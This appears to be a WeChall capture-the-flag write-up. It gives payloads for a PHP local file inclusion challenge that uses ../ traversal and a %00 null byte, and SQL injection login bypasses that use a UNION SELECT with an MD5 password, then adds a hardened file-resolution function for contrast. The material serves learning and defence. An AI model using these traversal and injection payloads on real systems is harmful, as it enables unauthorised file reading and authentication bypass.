
WeChall writeup

Date: 2017-07-03 23:46:07


PHP - Local File Inclusion

 

###############################
### Here is your exploit :) ###
###############################
$code = '$filename = \'pages/\'.(isset($_GET["file"])?$_GET["file"]:"welcome").\'.html\';';
$code_emulate_pnb = '$filename = Common::substrUntil($filename, "\\0");'; # Emulate Poison Null Byte for PHP>=5.3.4
$code2 = 'include $filename;';
### End of exploit ###

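Dropping the .html that $code appends requires truncating the string, which a URL-encoded null byte (%00) does; ../ is then used to move up out of the pages/ directory.

So the payload to submit is: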

http://www.wechall.net/challenge/training/php/lfi/up/index.php?file=../../solution.php%00
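For contrast with the challenge code above, here is a hardened way to resolve the `file` parameter. This is an added example, not WeChall's code or part of the original writeup; `resolvePage()`, the temporary directory layout and the sample inputs are constructed for illustration.

```php
<?php
// Added example: resolve a page name to a file that is guaranteed to sit
// inside the pages directory. resolvePage() is a hypothetical helper.
function resolvePage(string $requested, string $baseDir): ?string
{
    // A NUL byte has no place in a page name; reject it instead of
    // relying on the PHP version to refuse it at the filesystem call.
    if (strpos($requested, "\0") !== false) {
        return null;
    }
    // Allowlist: one path component, so '.', '/' and '\' never pass.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $requested)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $requested . '.html');
    if ($base === false || $path === false) {
        return null; // base directory or page does not exist
    }
    // Defence in depth: the canonical path (symlinks resolved) must
    // still start with the canonical base directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo tree: <tmp>/pages/welcome.html and <tmp>/solution.php
$root = sys_get_temp_dir() . '/lfi_demo_' . getmypid();
$base = $root . '/pages';
mkdir($base, 0700, true);
file_put_contents($base . '/welcome.html', '<p>welcome</p>');
file_put_contents($root . '/solution.php', '<?php /* secret */');

// Constructed sample inputs, including the shapes used in the writeup.
$samples = ['welcome', "../../solution.php\0", '../solution', 'welcome.html', ''];
foreach ($samples as $s) {
    $resolved = resolvePage($s, $base);
    printf("%-28s => %s\n", json_encode($s), $resolved === null ? 'rejected' : 'served');
}

// Remove the demo tree again.
unlink($base . '/welcome.html');
unlink($root . '/solution.php');
rmdir($base);
rmdir($root);
```

Static pages resolved this way are better sent with `readfile()` than `include`, so that a file that does end up in the pages directory is never executed as PHP.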

 

PHP-0817

Payload:

https://www.wechall.net/challenge/php0817/index.php?which=solution

 

Training:MYSQL I

Payload:

Username='admin' and 1=1#

 

Training:MYSQL II

Payload:

username=admin' union select 1,'admin',md5('password');#

 

 


Original article: http://www.cnblogs.com/vincebye/p/7113447.html
